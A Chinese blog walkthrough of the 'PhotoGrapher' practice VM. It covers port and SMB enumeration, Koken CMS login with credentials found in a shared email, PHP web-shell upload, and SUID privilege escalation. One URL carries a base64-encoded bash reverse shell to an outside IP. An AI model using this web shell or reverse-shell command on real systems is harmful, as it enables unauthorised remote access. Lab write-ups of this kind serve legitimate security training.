首页 > 其他分享 >靶机练习:PhotoGrapher

靶机练习:PhotoGrapher

时间:2024-04-12 14:47:57浏览次数:29  
标签:en 20 co PhotoGrapher 练习 端口 templated koken 靶机

扫端口

image-20240409102845136

image-20240409103057157

端口漏洞

80 端口 信息收集:

两个账号信息

v1n1v131r4

templated

dirsearch 进行目录扫描

/assets

/*main.js*/
/*
	Hielo by TEMPLATED
	templated.co @templatedco
	Released for free under the Creative Commons Attribution 3.0 license (templated.co/license)
*/

添加域名解析

172.16.33.88 templated.co

8000 端口 信息收集:

image-20240409105029445

image-20240409110419548

koken 搭建的站点,版本号0.22.24

image-20240409111656322

/admin 登录口,需要邮箱和密码登录

image-20240409151901905

smb服务信息收集

image-20240409151941506

image-20240409152029667

获取共享文件

image-20240409152428723

获取共享文件夹

Message-ID: <[email protected]>
Date: Mon, 20 Jul 2020 11:40:36 -0400
From: Agi Clarence <[email protected]>
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: Daisa Ahomi <[email protected]>
Subject: To Do - Daisa Website's
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi Daisa!
Your site is ready now.
Don't forget your secret, my babygirl ;)

账号:[email protected]

密码:babygirl

成功登录8000端口服务

获取权限

koken搭建的站点

image-20240409153653158

查看是否存在漏洞

image-20240409153728705

该txt阐述了如何利用koken上传木马

image-20240409153845729

image-20240409170544595

image-20240409170614558

访问

172.16.33.88:8000/storage/originals/48/02/test.php?cmd=echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguMC4xNjUvNTU1NSAwPiYx|%20base64%20-d|/bin/bash%20-i

# base64 加密
# 加密内容为经典反弹shell

拿shell

image-20240409171150456

提权

上述有suid权限的可执行文件

image-20240409171626725

成功提权

image-20240409171917952

标签:en,20,co,PhotoGrapher,练习,端口,templated,koken,靶机
From: https://www.cnblogs.com/cha0s32/p/18131170

相关文章

  • 27.C语言顺序循环结构结构练习题整理
    参考:https://www.qingsuyun.com/lib/d/600120380038000300010041/6、【单选题】语句while(!e);中的条件!e等价于()。[2分] ***AA、e==0B、e!=1C、e!=0D、~e9、【单选题】以下叙述正确的是()。[2分] ****BA、continue语句的作用是结束整个循环的执行......
  • 天梯赛-练习集-L2-002 链表去重(25分)
    L2-002链表去重代码长度限制:16KB时间限制:400ms内存限制:64MB题目描述给定一个带整数键值的链表L,你需要把其中绝对值重复的键值结点删掉。即对每个键值K,只有第一个绝对值等于K的结点被保留。同时,所有被删除的结点须被保存在另一个链表上。例如给定L为21→-15→-15......
  • 天梯赛-练习集 -L2-001 紧急救援, 一个不是很正常的过题方法
    L2-001紧急救援代码长度限制:16KB时间限制:200ms内存限制:64MB题目描述作为一个城市的应急救援队伍的负责人,你有一张特殊的全国地图。在地图上显示有多个分散的城市和一些连接城市的快速道路。每个城市的救援队数量和每一条连接两个城市的快速道路长度都标在地图上。当其他......
  • mysql函数练习题
    ......
  • 22.C语言有关程序结构循环练习
    6、【单选题】语句while(!e);中的条件!e等价于()。[2分] ***AA、e==0B、e!=1C、e!=0D、~e9、【单选题】以下叙述正确的是()。[2分] ****BA、continue语句的作用是结束整个循环的执行B、只能在循环体内和switch语句体内使用break语句C、在循环体......
  • 题目练习
    --创建表createtabledisney(idnumberprimarykey,datavarchar2(10));--创建序列createsequenceid_seq;--创建触发器createorreplacetriggerbifer_disney_id_pkbeFOReinsertondisneyFOReachrowbeginselectid_seq.nextvalinto:new.idFROMdual;......
  • LeetCode题练习与总结:排列序列--60
    一、题目描述给出集合 [1,2,3,...,n],其所有元素共有 n!种排列。按大小顺序列出所有排列情况,并一一标记,当 n=3时,所有排列如下:"123""132""213""231""312""321"给定 n和 k,返回第 k 个排列。示例1:输入:n=3,k=3输出:"213"示例2:输入:n=4,k=......
  • 数据同步练习-1
    一、    数据结构分析:(1)京津冀三省的2015年度的科技成果数据原始表,为Access数据库,; (2)要求将三省的科技成果数据汇总到同一表中(要求结果表为MySql数据表);(3)三个原始数据表结构不一致,要求结果表中包括所有的字段,表达意思相同或相似的字段要进行合并,不允许丢失字段(若只有本表独......
  • dp 练习 2024.3.9
    Luogu8389[ZJOI2022]树考虑容斥,每个点有三个状态:不钦定、钦定都是叶子、钦定都是非叶子。对于每一种钦定状态都计算答案,然后乘上对应容斥系数即可。叶子的钦定是可做的,考虑非叶子的钦定,我们可以用“容斥套容斥”的思想理解:对于钦定都是非叶子的点\(i\),考虑用总方案数减去钦定......
  • 【C语言】练习:比较十个数的大小
    初始化一个数组,使用for循环输入;把数组中的第一个数字,也就是下标为[0]的数字赋值给一个int类型的变量“max”;使用循环从arr数组中下标为[1]的数字开始对比,如果arr[1]>arr[0],则把arr[1]赋值给max;最后打印出最大数。intmain(){ intarr[10]; for(inti=0;i<10;......